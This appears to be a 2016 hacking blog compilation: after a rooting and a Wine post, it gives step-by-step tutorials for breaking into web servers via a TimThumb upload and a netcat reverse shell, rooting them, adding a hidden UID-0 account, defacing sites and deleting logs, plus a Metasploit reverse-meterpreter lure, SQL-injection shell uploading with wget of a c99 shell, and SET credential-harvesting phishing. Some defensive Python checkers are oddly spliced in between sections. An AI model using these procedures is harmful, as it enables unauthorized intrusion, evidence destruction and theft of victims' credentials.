Friday 10 June 2016

How to Root Android without Computer (APK ROOT without PC)

Kingo Android Root has launched its KingoRoot APK for Android, which provides a universal one-click root solution for Android users. It is easy to use and saves the trouble of connecting to a PC via USB cable.
Before jumping into the rooting process, please make sure you get everything right beforehand.
  • Device powered on.
  • At least 50% battery level.
  • Internet connection necessary (Wi-Fi network suggested).
  • Allow installation of apps from unknown sources. Settings > Security > Unknown Sources

Root Android via KingoRoot APK Without PC Step by Step


Step 1: Free download KingoRoot.apk.

The download will be automatically started. If Chrome has warned you about KingoRoot.apk, click "OK" to proceed.
If you are using PC to view this tutorial, you have three choices.

Step 2: Install KingoRoot.apk on your device.

If you didn't check "Unknown Sources" in Settings > Security, then during installation, you will get a prompt "Install blocked", stating that "For security, your phone is set to block installation of apps obtained from unknown sources".
Just follow phone instructions and install Kingo Root on your device and allow installs from "Unknown Sources".

Step 3: Launch "Kingo ROOT" app and start rooting.

Kingo Root is very user-friendly and easy to use. Click "One Click Root" to start the rooting process.

Step 4: Wait a few seconds until the result screen appears.


Step 5: Succeeded or Failed.

It is highly recommended that you try several times when rooting with the KingoRoot APK version. Several rooting methods are integrated into the APK, but it runs only one at a time.

Tuesday 31 May 2016

How to install Wine on Kali Linux and Debian 64 bit

To install Wine, we'll first enable multiarch, then update the system, and finally install Wine. The commands are shown below.

sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install wine:i386
sudo apt-get install wine-bin:i386
This downloads and installs the packages. After the installation finishes, confirm that Wine was installed successfully by typing:
wine --version 
If you want an all in one command, here it is.
 sudo dpkg --add-architecture i386 && sudo apt-get update && sudo apt-get install wine-bin:i386

Wednesday 13 April 2016

How to Hack a Server [Shell Uploading, Rooting, Defacing, Covering your Tracks]

When I had the idea to expand our Blog’s topics (not only Apple, iPhone, iPad, little tips on Mac and Windows etc….) and add more hacking information, tutorials etc….
So, today I decided to make a good start by creating this post-tutorial: How to Hack a Server
Everything you need to know….

Tools you need:

– Backtrack (Backtrack Website)
– Firefox (get it from here….) – Included in Backtrack and Ubuntu
– Netcat (Included in Backtrack)   — If you are on other Linux environments get it from here….
– iCon2PHP (Get it from here….)
– A good shell (iCon2PHP Archive includes three great shells)
– A good VPN or Tor (More explanation below…..)
– Acunetix Web Vulnerability Scanner (Search for a cracked version at Hackforums.net)

About the Tools:

Backtrack
— Backtrack is a Linux distribution based on Ubuntu. It includes everything you need to become a good hacker. Apart from this, hacking behind a Linux system is better than a Windows one since most Websites are on Linux Servers.
(Just a little tip: To wirelessly connect to a network use the Wicd Network Manager, located under the Applications->Internet)
Firefox
— Firefox is the best browser for hacking. You can easily configure a proxy and you can download millions of add-ons among which you can find some for Hacking. Find more about “Hacky” addons for Firefox Here….
Netcat
— Netcat is a powerful networking tool. You will need this to root the server….
iCon2PHP & Good Shells
— iCon2PHP is a tool I created and you will use it if you upload the image to an Image Uploader at a Forum or Image Hosting Service. iCon2PHP Archive contains some of the top shells available.
Good VPN or TOR (Proxies are good too…)
— While hacking you need to be anonymous so as not to find you (even if you forget to delete the logs….). A VPN stands for Virtual Private Network and what it does is: hiding your IP, encrypting the data you send and receive to and from the Internet. A good VPN solution for Windows Machines is ProXPN. However, with VPN connections (especially when you are under a free VPN connection) your connection speed is really slow. So, I wouldn’t recommend VPN except if you pay and get a paid account.
What I would recommend is Tor. Tor can be used from its bundle: Vidalia, which is a great tool for Windows, Mac and Linux that uses Proxies all over its network around the world so as to keep you anonymous and changing these Proxies every 5-10 minutes. I believe it is among the best solutions to keep you anonymous if you don’t want to pay for a Paid VPN account
Apart from Tor, simple Proxies are good but I wouldn’t recommend them as much as I would for Tor.
                — If I listed the above options according to their reliability :                                 
1. Paid VPN Account at ProXPN
2. Tor
3. Free VPN Account at ProXPN
4. Proxy Connection
Acunetix Web Vulnerability Scanner
— Acunetix is (maybe the best) Vulnerability Scanner. It scans for open ports, vulnerabilities, directory listing. During the scan it lists the vulnerabilities and says how a hacker can exploit it and how to patch it. It also shows if it is a small or big vulnerability.
The Consultant Edition (For unlimited websites) costs about 3000-7000$.
____________________________________________________________

Starting the Main Tutorial:

So, here is the route we will follow:
Find a Vulnerable Website –> Upload a c100 Shell (Hidden in an Image with iCon2PHP) –> Rooting the Server –> Defacing the Website –> Covering your Tracks

– – –  Before we begin  – – –

-Boot to Backtrack
-Connect to your VPN or to Tor.
-It would be good to read a complete guide to stay anonymous while hacking here…
-Open Firefox.

1. Finding a Vulnerable Website and Information about it:

Crack Acunetix (find tutorial at Hackforums.net). Open and scan the  website (use the standard profile – don’t modify anything except if you know what you are doing). For this tutorial our website will be: http://www.site.com (not very innovative, I know….)
Let’s say we find a vulnerability where we can upload a remote file (our shell) and have access to the website’s files.
The Warning should be something like this. It can mention other information or be a completely other warning (like for SQL Injection – I will post a Tutorial on this also…), too! (Depends on the Vulnerability) What we need at this tutorial is that we can exploit the ‘File Inclusion Attack’ and Have access to the Website’s Files. (This is not the warning we need for this tutorial, but it is related to what we do too.)
OK. Now, we have the site and the path that the vulnerability is. In our example let’s say it is here:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php
The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven’t updated to the latest version of TimThumb, which is a image-editing service on websites.
OK. Acunetix should also mention the OS of the Server. Assuming that ours is a Unix/Linux system (so as to show you how to root it).
For now, we don’t need anything more from Acunetix.

2. Uploading the shell:

Till now, we know:
-The website’s blog has a huge vulnerability at TimThumb.
-It is hosted on a Unix System.
Next, because of the fact that the Vulnerability is located at an outdated TimThumb version, and timthumb is a service to edit images, we need to upload the shell instead of the image.
Thus, download any image (I would recommend a small one) from Google Images. We don’t care what it shows.
Generate Output with iCon2PHP
Copy your Image and your Shell to the Folder that iCon2PHP is located.
Run the Program and follow the in-program instructions to build the ‘finalImage.php’.
To avoid any errors while uploading rename the ‘finalImage.php’ to ‘image.php;.png’ (instead of png, type the image format your image was – jpeg, jpg, gif….). This is exactly the same file, but it confuses the uploader, which thinks that it actually is an image.
iCon2PHP Terminal Output:
[…]
Enter the Path of your Image:   image.png
Please enter the path to the PHP:   GnYshell.php
Entered!
Valid Files!
[…]
File: ‘finalImage.php’ has been successfully created at the Current Directory…
Upload Output to a Server:
Next, upload your ‘image.php;.png’ at a free server. (000webhost, 0fees etc….)
Go to the vulnerability and type at the URL:
http://www.site.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png
It would be better to create a subdomain like “flickr.com” (or other big image-hosting service) because sometimes it doesn’t accept images from other websites.
Website…. Shelled!

OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.
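Seen from the defender's side, the request in this section succeeds only if the thumbnail script accepts a remote source whose host merely contains an allowed name and whose file name merely ends in an image extension. The following Python check is an added example, not TimThumb's code and not part of the original post; the allowlist, the function names and the sample URLs are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import urlsplit

# Assumed allowlist for illustration; not taken from the original post.
ALLOWED_HOSTS = {"flickr.com", "imgur.com"}
IMAGE_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
# Script extensions that must not appear as any suffix of a fetched file name.
SCRIPT_EXTENSIONS = {"php", "phtml", "phar", "cgi", "pl"}


def weak_host_check(url):
    """Substring match: passes any host that merely contains an allowed name."""
    host = (urlsplit(url).hostname or "").lower()
    return any(allowed in host for allowed in ALLOWED_HOSTS)


def strict_host_check(url):
    """Accept only http(s) URLs whose host is an allowed domain or a real subdomain of one."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").rstrip(".").lower()
    return any(host == a or host.endswith("." + a) for a in ALLOWED_HOSTS)


def safe_image_name(url):
    """Reject names such as 'image.php;.png' that only end in an image extension."""
    name = posixpath.basename(urlsplit(url).path).lower()
    _, ext = posixpath.splitext(name)
    if ext not in IMAGE_EXTENSIONS or ";" in name:
        return False
    # Every dot- or semicolon-separated suffix is inspected, not just the last one.
    suffixes = re.split(r"[.;]", name)[1:]
    return not any(s in SCRIPT_EXTENSIONS for s in suffixes)


def accept_remote_source(url):
    """Gate a remote 'src' value: exact host match and a clean image file name."""
    return strict_host_check(url) and safe_image_name(url)


# Constructed sample URLs; the first is the form of request shown in the post.
SAMPLE_URLS = [
    "http://flickr.com.domain.0fees.net/image.php;.png",
    "https://farm1.static.flickr.com/photos/cat.png",
    "https://flickr.com/shell.php.png",
    "ftp://flickr.com/cat.png",
]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(f"weak={weak_host_check(url)!s:5} strict={strict_host_check(url)!s:5} "
              f"name_ok={safe_image_name(url)!s:5} accept={accept_remote_source(url)!s:5} {url}")
```

Host and name checks are only the first gate: a fetcher should also decode the bytes as an image and store the result under a generated name in a directory where the web server does not execute scripts.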

3. Root the Server:

Now that you have shelled your website we can start the process to root the server.
What is rooting when it comes to Server Hacking?
—> Rooting a server is the procedure by which the hacker acquires root privileges on the whole server. If you don’t understand this yet, I reassure you that by the end of the section “Rooting a server” you will have understood exactly what it is…
Let’s proceed to rooting….
Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:
netcat
4. Now type:
-l -n -v -p 402
5.It should have an output like this:
listening on [any] 402 port
6. Now, go to the Back-Connection function at the Shell.
7. Complete with the following:
Host:YouIPAddress Port: 402 (or the port you forwarded….)
8. Hit connect and… Voila! Connected to the server!
Downloading and Executing the Kernel exploit:
1. Now, if you type:
whoami
you will see that you are not root yet…
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits here….
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:
— The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)
(( If the program is in C you have first to compile it by typing: gcc exploit.c -o exploit ))
— Change the permissions of the exploit:
chmod 777 exploit
5. Execute the exploit. Type:
./exploit
6. Root permissions acquired! Type this to ensure:
id
or
whoami
7. Add a new root user:
adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username
8. Change the password of the new root user:
passwd root1
SUCCESSFULLY ROOTED!
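Step 7 above leaves a durable artifact that a defender can look for: a second account with UID 0. The following Python audit is an added example, not part of the original post; it parses passwd-format text and reports extra UID 0 accounts, shared UIDs and malformed lines. The sample data is constructed, with the name root1 taken from the step above.

```python
from collections import defaultdict

# Constructed sample in /etc/passwd format (not from a real host).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
root1:x:0:0::/home/root1:/bin/bash
# comment line
broken-line-without-fields
"""


def parse_passwd(text):
    """Return (entries, malformed_line_numbers) for passwd-format text."""
    entries, malformed = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        # A valid entry has 7 fields with numeric UID and GID.
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            malformed.append(lineno)
            continue
        entries.append({"name": fields[0], "uid": int(fields[2]),
                        "gid": int(fields[3]), "shell": fields[6]})
    return entries, malformed


def audit(text):
    """Flag accounts that share UID 0 with root, plus any other shared UIDs."""
    entries, malformed = parse_passwd(text)
    by_uid = defaultdict(list)
    for entry in entries:
        by_uid[entry["uid"]].append(entry["name"])
    return {
        "extra_uid0": sorted(n for n in by_uid.get(0, []) if n != "root"),
        "shared_uids": {uid: names for uid, names in by_uid.items() if len(names) > 1},
        "malformed_lines": malformed,
    }


if __name__ == "__main__":
    # On a live system, pass the contents of /etc/passwd instead of the sample.
    report = audit(SAMPLE_PASSWD)
    for key, value in report.items():
        print(f"{key}: {value}")
```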

4. Deface the Website:

What is defacing?
Defacing is the procedure by which the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or pass a message to the people or the company (which owns the website…).
Since you got the website shelled, you just create a nice hacky page in html and upload it via the Shell as inbox.html (Delete or rename the website’s one…)

5. Cover your tracks:

Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you we have to delete logs.
First of all, Unix-based machines have some logs that you had better either edit or delete.
Common Linux log files name and their usage:
/var/log/message: General message and system related stuff
/var/log/auth.log: Authentication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files
In short /var/log is the location where you should find all Linux logs file.
To delete all of them by once type:
su root1
rm -rf /var/log
mkdir /var/log

Hacking Remote Machines With Firefox Bootstrapped Addon

Metasploit basically has two types of exploits in its database: remote exploits and client-side attacks.
In this tutorial, I will show you how to use Metasploit's bootstrapped Firefox addon over a WAN (wide area network) or the Internet.

Requirements:

  • Router (With Port Forwarding Support)
  • Metasploit Framework
Exploit Title: Firefox Bootstrapped Addon

I will use teamviewer to show you remote machine's ip and activities status.

Attacker's Public IP: 182.186.248.2

Attacker's Internal IP: 192.168.1.7
Attacker's Payload's LPORT: 7777
Victims IP: X.X.X.X

Step1: 
Forward following two ports for Attacker's internal IP which is 192.168.1.7:
  1. webserver port which is 8080 in my case ..in metasploit this defined by SRVPORT parameter
  2. payload port which is 7777 is in my case .. in metasploit it is defined by LHOST parameter
Step2: 
Now start msfconsole and use following exploit:

use exploit/multi/browser/firefox_xpi_bootstrapped_addon


use your public IP for LHOST parameter while remaining all parameters will get internal IP. Like this:


set srvhost 192.168.1.7
set srvport 8080
set uripath /
set payload windows/meterpreter/reverse_tcp
set lhost 182.186.248.2 set lport 7777

Step3:
Now send this server's address to victim: 
http://182.186.248.2:8080/

When victim will run this addon after installation, he/she will be pwned :)
You will get a reverse meterpreter session. Happy hacking :)




If you feel some trouble while following tutorial you may ask me in comments.

Pyloris Application Layer DOS ATTACK Tool


PyLoris is a Python implementation inspired by the Slowloris tool, which was written in Perl.
PyLoris is a scriptable tool for testing a server's vulnerability to connection exhaustion denial of service (DoS) attacks. PyLoris can utilize SOCKS proxies and SSL connections, and can target protocols such as HTTP, FTP, SMTP, IMAP, and Telnet.

Download Pyloris

Shell Uploading With SQL Injection

direct shell uploading with SQL injection queries

First of all find a website which is vulnerable to sql injection. You can find websites by dorks or manually like i have found this.
You need 2 main things:

Root Path of the website
A Writable Directory

Most of the time, you will see the root path in an SQL error of that site, like the following one.

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/aeiti/public_html/admin/requires/functions.php on line 1327

Well If the vulnerable website doesn't show the root path then don't worry i will show you how to know the root path. And Also Writable Directory.

www.site.com/index.php?id=10'

I am not starting with abc of SQLI I hope u know the basics.
Now we have to find the columns of the website, then the vulnerable columns. For example, my site has 5 columns and 3 is the vulnerable column.

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--

Let's Try To Load Files Of The Website

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--
www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--

We won't need to read any of the files mentioned above; they are just to increase your knowledge. Now we have to check the file privileges for the current user. For this, you first have to find the current username.
Like This

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--

Our Current Username is etc mine is Ch3rn0by1
Now Check File Privilages for User Ch3rn0by1

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='Ch3rn0by1'--

If it shows Y (yes) on the vulnerable column of the website that means we have the file privileges for the current user Ch3rn0by1
And if it doesn't show Y then Don't waste your time there :D

OK. Now we need to know the root path for this webserver. For this information we need to know the webserver type. For this you can use the Firefox add-on Server Spy.
Server Spy add-on: https://addons.mozilla.org/en-us/firefox/addon/server-spy/
You can use havij and some other tool too to detect webserver type.
To know the webserver by file /etc/passwd use this query

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('/etc/passwd'),5--

now we have our webserver etc (/home/Ch3rn0by1)
now read one more file.

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('etc/Ch3rn0by1.conf')4,5--

Where Ch3rn0by1 is your webserver software name like server name.conf .

now we have the root path

/home/site.com/public_html etc.

Now we have to find a writeable directory for this you can use google dorks as well and your knowledge too :D

site www.site.com/dir/*/*/*/*/

so its site.com/ch3rn0by1/writeable

now we will upload our evil code

www.site.com/index.php?id=10 UniOn SeleCt 1,2,"",4,5 into outfile '/home/site/public_html/Ch3rn0by1/writeable directory/Ch3rn0by1.php'--+

ok now we have to execute our commands

www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=pwd
www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=uname -a

Now we will use wget command to upload our evil script

www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=wget http://www.shellsite.com/c99.txt

Now we will rename our c99.txt to php in order to execute it :D

www.site.com/Ch3rn0by1/writeable directory/Ch3rn0by1.php?cmd=mv c99.txt c99.php

now open it
www.site.com/Ch3rn0by1/writeable directory/c99.php VOILA OUR SHELL GOT LIVE :D
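Every request in this walkthrough is a GET, so the whole sequence ends up in the web server's access log. The following Python detector is an added example, not part of the original post: it decodes each request target (including double URL-encoding), strips inline SQL comments, and tags the UNION SELECT, load_file, INTO OUTFILE and privilege-probe stages described above. The log lines, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in common log format (documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [13/Apr/2016:10:01:02 +0000] "GET /index.php?id=-10%20UniOn%20SeleCt%201,2,version(),4,5-- HTTP/1.1" 200 512
203.0.113.7 - - [13/Apr/2016:10:01:40 +0000] "GET /index.php?id=-10+UniOn+SeleCt+1,2,load_file('/etc/passwd'),4,5-- HTTP/1.1" 200 2048
203.0.113.7 - - [13/Apr/2016:10:03:11 +0000] "GET /index.php?id=10%20UNION/**/SELECT%201,2,%22%22,4,5%20INTO%20OUTFILE%20%27/home/site/public_html/up/x.php%27--+ HTTP/1.1" 200 0
198.51.100.4 - - [13/Apr/2016:10:04:00 +0000] "GET /index.php?id=10 HTTP/1.1" 200 900
203.0.113.7 - - [13/Apr/2016:10:05:30 +0000] "GET /index.php?id=-10%2520union%2520select%25201,2,file_priv,4,5%2520from%2520mysql.user-- HTTP/1.1" 200 300
"""

LINE_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (.+?) HTTP/[\d.]+" (\d{3})')

# Rule names are illustrative; patterns run on the normalized request target.
RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "file_read": re.compile(r"\bload_file\s*\("),
    "file_write": re.compile(r"\binto\s+(?:out|dump)file\b"),
    "priv_probe": re.compile(r"\bfile_priv\b|\bmysql\.user\b"),
}


def decode_target(target, max_rounds=3):
    """URL-decode repeatedly so double-encoded payloads are also seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def normalize(text):
    """Lowercase, drop /* */ comments used to split keywords, collapse whitespace."""
    text = re.sub(r"/\*.*?\*/", " ", text.lower(), flags=re.S)
    return re.sub(r"\s+", " ", text)


def classify(target):
    """Return the sorted names of all rules that match one request target."""
    text = normalize(decode_target(target))
    return sorted(name for name, rx in RULES.items() if rx.search(text))


def scan(log_text):
    """Return (client_ip, status, rule_hits) for every log line with at least one hit."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        hits = classify(m.group(2))
        if hits:
            findings.append((m.group(1), int(m.group(3)), hits))
    return findings


if __name__ == "__main__":
    for ip, status, hits in scan(SAMPLE_LOG):
        print(ip, status, ",".join(hits))
```

Detection is the fallback: parameterized queries remove the injection itself, and a database account without the FILE privilege, together with a restrictive MySQL `secure_file_priv` setting, blocks the load_file and INTO OUTFILE stages.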

Hacking Facebook with Kali

Steps for setting up your system.

  1. Download Kali Linux from here.
  2. Extract the contents of the Kali Linux ISO file which you downloaded in step and copy it to a pendrive, or burn the ISO file to a CD if you want to make a CD of it.
  3. After copying all contents to the pendrive or burning the ISO file to a CD, reboot your system, press F8 at boot time and select boot from pendrive if you copied the files to a pendrive, or boot from CD-ROM if you burned the ISO file to a CD.
  4. After selecting the boot device, the Kali installation window will open; install according to your requirements.
  5. NOTE: During installation, set the mount point of the selected installation drive to "/".
  6. Remember the username and password you set during installation, as they will be necessary for this hacking method.
  7. Once installation is completed, the system will reboot; log in to your account.
  8. Your system is ready for use.
The method we are using to hack the username and password or any user details is the Social Engineering Toolkit method.


Now lets set it up.

  • Open terminal using ctrl+alt+t or click on the small black window image on the top left of your screen.
  • Once terminal is open,type the code carefully.
sudo root
 Then enter your root username and password.Don't close the terminal.

  • Next step is to open social engineering toolkit.For this type the below command in terminal.
se-toolkit

 You will see something in terminal of your system as shown below in the image.
  
  • As shown above in image,you too will see the menu in your terminal.Press "1" and hit enter as we are going to do Social-Engineering Attacks.You will see something in terminal as shown below in the image.
  • Once again,you will get a menu as shown above in the image.We are going to select Website Attack Vectors,so press "2" and hit enter.You will see something as shown in the image below.
  • In this method,we are going to get the credential of the victim,so press "3" and hit enter as it will select credential harvester attack method.This will open  new menu as shown below in the image.

  • Since,we want the username and password which is credential of victim,so we need to trap the victim in a look a like page to original website page(like phishing page) and for that we need to clone a website.To do this,press "2" and hit enter which will open something like shown below.
In above image,you might have noticed a red colour rectangle box made by me,in that box,you will find "tabnabbing:XXX.XX.XXX.X" where this "XXX.XX.XXX.X" is you computer IP address.To find IP address of your computer,open a new terminal and type the command given below.
su root
enter_your_root_password
 ifconfig
In above command,we first gain the root access,and then afterwards type "ifconfig"  and hit enter to get the IP address.
Copy paste this IP address at the end of "Tabnabbing:".I have used my IP address but for security reasons i can't reveal it,so i have posted here "XXX.XX.XXX.X".Please note that,if you don't put your computer IP address,they this method won't.After entering your IP address,hit enter.It will ask your to enter the url of website you want to clone as shown below.Here,i had entered "www.ymail.com" as i want to hack someone ymail account.The below image represents all the steps.
It will give a message that its working on cloning the site and will take a little bit time.
Once the process is completed,you will see something as shown in the image below.
  • The next step is the most important step,till now we have make your IP address go online and anyone who visit your IP address will see the page which will look like the website of whose url you entered to clone.In this step,you need to shortened your IP address by using services like ADF.LY, Binbox, Goo.gl,etc.Once you enter your ip address on these sites to shorten,they will provide you a link,all you need to do is just send this shortened link to your victim.
  • When the victim visit the url which you have sent them,the will see a same page of which                   url you had entered to clone the website.The victim will think that it is a original page and when the victim enters any of their information,you will see that information in the terminal.
  • In this example,i have used ymail.com.Therefore,the victim will see homepage of yahoo mail.This is only the login form,i have entered the login username as:"Kali used to hack email-id and password" and password as: "Hacking successfull".

NOTE:Victim can identify that the page is a trap as the address bar of browser will be having your IP address.For best results,send the shortened url to victim mobile and ask them to visit urgently,or you can say visit this link and login to get latest updates of their favourite contents,etc.

RESULT.

The username and password will be shown in terminal window and will be similar to the image shown below.